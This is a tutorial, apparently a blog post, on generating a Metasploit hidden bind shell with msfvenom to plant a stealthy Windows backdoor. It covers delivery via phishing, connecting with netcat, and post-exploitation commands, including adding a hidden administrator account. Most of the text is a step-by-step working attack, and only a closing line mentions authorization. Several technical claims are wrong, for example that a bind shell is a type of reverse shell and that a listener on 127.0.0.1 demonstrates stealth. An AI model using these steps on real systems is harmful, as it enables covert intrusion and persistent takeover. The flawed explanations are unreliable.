Metasploit : Creating a Stealthy Windows Hidden Bind Shell

 What is a Windows Hidden Bind Shell?

A bind shell is a type of reverse shell where the victim machine listens for incoming connections on a specific port. However, in typical bind shells, the open port can be detected by tools like Nmap, Zenmap, or other port scanners. This is where the Hidden Bind TCP Shellcode comes into play.

The hidden bind shell works by only accepting connections from a specific, pre-defined IP address (the attacker’s IP), and rejecting any other incoming connections by sending a reset (RST) packet. This ensures that the open port appears closed or filtered to anyone scanning the machine, except for the attacker who knows the correct IP address to connect from.

Pre-requisites

Before we start the process, ensure you have the following components in place:

1. Kali Linux – Your attacking machine, where you will generate and deploy the Metasploit payload.
2. Windows 10 – The victim machine that you will exploit.
3. Nmap – The tool that will be used for network scanning, which will show how the port behaves during a scan.
4. Netcat – A tool used to interact with the open port on the victim machine, allowing you to execute commands remotely.

Step 1: Crafting the Payload with msfvenom

The first step in using the Hidden Bind Shell is generating the payload using msfvenom, a tool within the Metasploit Framework. The payload will allow the victim's machine to create a listener on a specific port that only accepts connections from the attacker's IP. The following command creates a Windows Hidden Bind TCP Shell payload that listens on port 1337:

msfvenom -p windows/shell_hidden_bind_tcp ahost=192.168.1.2 lport=1337 -f exe > file.exe

Breaking Down the Command:

• -p windows/shell_hidden_bind_tcp: This specifies that we are using the windows/shell_hidden_bind_tcp payload, which creates a bind shell that is stealthy and only listens for connections from the specified attacker IP.
• ahost=192.168.1.2: This is the attacker's IP address. The victim machine will only accept connections on port 1337 from this address.
• lport=1337: The victim’s machine will listen for incoming connections on port 1337. You can change this port to any number you prefer, but for this example, we are using 1337.
• -f exe: This flag specifies that the payload should be generated as a Windows executable (.exe), which can then be transferred to the victim’s machine.
• > file.exe: This part of the command redirects the output to a file called file.exe. This file will be transferred and executed on the victim’s machine.

Step 2: Transferring and Executing the Payload on the Victim’s Machine

Once the payload is generated, the next step is to deliver it to the victim machine. This can be done using various methods such as phishing emails, social engineering, or physical access to the target machine. After the payload file.exe is executed on the victim machine, a listener is created on port 1337, awaiting connections from the attacker’s IP.

Step 3: Verifying the Payload with netstat

After the payload is executed on the victim’s machine, we can verify that the hidden bind shell is running. The tool we will use for this is netstat, a command-line utility that displays active network connections and listening ports.

On the victim's machine, open a Command Prompt and run the following command:

netstat -ano

Expected Output:

This command will display a list of all active network connections, including listening ports. The output should show port 1337 as an active listening port, but it will not reveal an external IP address or any remote connection. Instead, the output will look like this:

TCP    127.0.0.1:1337             0.0.0.0:0              LISTENING       1234

This shows that port 1337 is listening, but it's only visible to the local machine (127.0.0.1). Any external scan will fail to detect it, as the port is effectively "hidden."

Step 4: Scanning the Victim’s Machine Using Nmap

Next, the victim may try to scan the machine using Nmap to detect open ports. However, the hidden bind shell will make port 1337 appear closed.

On the victim’s machine, run the following Nmap command:

nmap -p 1337 192.168.1.145

Expected Output:

PORT     STATE  SERVICE
1337/tcp  closed unknown

The Nmap scan shows that port 1337 is closed even though the victim’s machine is listening on that port. This happens because the victim's machine is configured to reject connections from unauthorized IP addresses (except the attacker’s). Therefore, the victim’s machine will respond with a reset (RST) packet to any connection attempt from an unknown IP.

Step 5: Scanning from Kali Linux (Attacker’s Machine)

Now, let's demonstrate how the attacker can detect the open port. On your Kali machine, you can scan the victim's machine for open ports. This scan will show that port 1337 is indeed open, as the victim's machine will only respond to the attacker’s IP.

On Kali, run the following Nmap command:

nmap -p 1337 192.168.1.145

Expected Output:

PORT     STATE  SERVICE
1337/tcp  open  unknown

From the attacker’s perspective, the port is open and ready to accept connections. However, to anyone else scanning the victim machine from a different network, the port will remain invisible, appearing as closed or filtered.

Step 6: Interacting with the Bind Shell Using Netcat

With the hidden bind shell active and waiting for connections from the attacker, the next step is to interact with the shell using Netcat. Netcat will allow the attacker to open a connection to the victim machine's hidden bind shell on port 1337.

On Kali, run the following command to connect to the victim's machine:

nc 192.168.1.145 1337

Expected Output:

Once the connection is established, you will have access to the victim's machine through the bind shell. You can now issue commands and interact with the system as though you were physically on the machine.

At this point, you can execute commands on the victim machine. Here are some useful commands you can try:

1. Viewing the System Information

You can gather information about the victim’s system by using the following command:

systeminfo

Explanation: This command displays detailed information about the victim’s system, including OS version, installed updates, network configurations, and more. This is useful for gathering intelligence before further exploitation.

2. Viewing Active Users

To see the active users logged into the system:

query user

Explanation: This command lists all active users on the victim machine. This can be helpful if you're trying to identify specific users or look for weak points in the system.

3. Running a Process List

You can see the list of active processes with the following command:

tasklist

Explanation: The tasklist command shows all running processes on the victim machine. You can use this to search for processes that could potentially be exploited or to monitor the machine's activity.

4. Downloading Files from the Victim Machine

If you need to download a file from the victim’s machine, use the copy command to move it to a specific location:

copy C:\path\to\file.txt C:\path\to\newlocation.txt

Explanation: This command copies files from one directory to another. If you have local file system access, you can use this to gather information from the victim machine.

5. Creating a New User

If you want to create a new user with administrative privileges, you can use:

net user hacker Password123 /add
net localgroup administrators hacker /add

Explanation: The first command adds a new user named hacker with the password Password123, while the second command adds this new user to the administrators group, giving the attacker full control of the system.

Conclusion

In this advanced guide, we demonstrated how to use Metasploit’s Hidden Bind Shell to create a stealthy backdoor on a Windows machine that is nearly undetectable by traditional port scanning tools. By using msfvenom to generate the payload, we ensured that the backdoor would only respond to connections from the attacker’s IP, making it invisible to external scans. We also used Nmap to demonstrate how the open port appears closed to anyone except the attacker.

This technique is powerful for penetration testers aiming to bypass defensive measures and remain undetected within a target network. However, it’s important to always conduct ethical hacking and penetration testing with proper authorization and legal clearance. Unauthorized access to computer systems is illegal and unethical.